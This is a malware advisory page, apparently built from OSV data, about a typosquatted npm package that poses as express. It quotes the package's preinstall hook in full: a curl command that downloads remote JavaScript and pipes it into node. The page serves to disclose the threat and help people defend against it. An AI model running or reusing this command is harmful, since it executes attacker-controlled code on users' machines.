Logo
npm

express-javascript@5.2.2

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 3:26 AM UTC

Malicious

OSV ID

MAL-2026-17242

Ecosystem

npm

Summary

express-javascript@5.2.2 is a typosquat of the real express framework, shipping cloned package metadata (author TJ Holowaychuk, repository expressjs/express, homepage expressjs.com, matching keywords and dependencies) to appear as the genuine package. Its package.json declares a preinstall lifecycle hook that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, downloading a remote, unpinned, non-publisher JavaScript payload from a third-party Russian code-hosting service (proxied through web.archive.org) and piping it directly into node for execution. The fetch and execute fire automatically on npm install with no integrity check, no version pinning, and no relation to the express project's real infrastructure. The fetched content is attacker-controlled and can change at any time.

Source: amazon-inspector (a84bd81adecaf93be6fe963765bf1686f6b6bcefac1b8a6124bc2841053fd265)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.